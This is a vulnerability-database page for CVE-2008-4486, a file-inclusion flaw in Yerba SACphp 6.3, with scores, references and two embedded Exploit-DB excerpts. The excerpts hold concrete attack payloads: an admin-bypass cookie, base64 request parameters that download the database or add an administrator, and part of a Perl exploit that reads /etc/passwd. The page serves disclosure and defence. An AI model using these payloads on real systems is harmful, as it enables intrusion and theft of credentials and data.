CVE-2008-4486
published 2008-10-08CVE-2008-4486: Directory traversal vulnerability in index.php in SAC.php (SACphp), as used in Yerba 6.3 and earlier, allows remote attackers to include and execute arbitrary…
PriorityP350critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
4.78%
90.8th percentile
Directory traversal vulnerability in index.php in SAC.php (SACphp), as used in Yerba 6.3 and earlier, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the mod parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yerba | yerba | <= 6.3 | — |
| yerba | yerba | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Yerba SACphp 6.3 - Multiple Vulnerabilities
exploitdb·2008-10-07
CVE-2008-5873 Yerba SACphp 6.3 - Multiple Vulnerabilities
Yerba SACphp 6.3 - Multiple Vulnerabilities
---
[*]~======================================================~[*]
[*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*]
[*]~======================================================~[*]
[?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
[?] Discovered On 07/10/2008
[?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0
[?] Admin Login ByPass
[?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="
[?] Privilege Escalation
[?] index.php?SID=[path (base64 encoded)]
[?] Arbitrary Database Download
[?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==
[?] Arbitrary Add Admin
[?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
# mi
Exploit-DB
Yerba SACphp 6.3 - Local File Inclusion
exploitdb·2008-10-06
CVE-2008-4486 Yerba SACphp 6.3 - Local File Inclusion
Yerba SACphp 6.3 - Local File Inclusion
---
#!/usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Yerba SACphp
# eNYe-Sec - www.enye-sec.org
#
# Bug:
# 37- include("modulos/$mod/mod_nucleo.php");
use LWP::UserAgent;
use HTTP::Request::Common;
my ($host, $file) = @ARGV ;
unless($ARGV[1]){
print "\nUsage: perl $0 \n";
print "\tex: perl $0 http://localhost /etc/passwd\n\n";
exit 1;
}
$host = 'http://'.$host if ($host !~ /^http:/);
$host .= "/" if ($host !~ /\/\$/);
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
$ua->timeout(10);
my $request = HTTP::Request->new();
my $response;
my $url = $host."index.php";
my $req = HTTP::Request->new(POST => $host."index.php");
$req->content_type('ap
No writeups or analysis indexed.
http://secunia.com/advisories/32093http://securityreason.com/securityalert/4368http://www.securityfocus.com/archive/1/497103http://www.securityfocus.com/bid/31606http://www.vupen.com/english/advisories/2008/2754https://exchange.xforce.ibmcloud.com/vulnerabilities/45708https://www.exploit-db.com/exploits/6687http://secunia.com/advisories/32093http://securityreason.com/securityalert/4368http://www.securityfocus.com/archive/1/497103http://www.securityfocus.com/bid/31606http://www.vupen.com/english/advisories/2008/2754https://exchange.xforce.ibmcloud.com/vulnerabilities/45708https://www.exploit-db.com/exploits/6687
2008-10-08
Published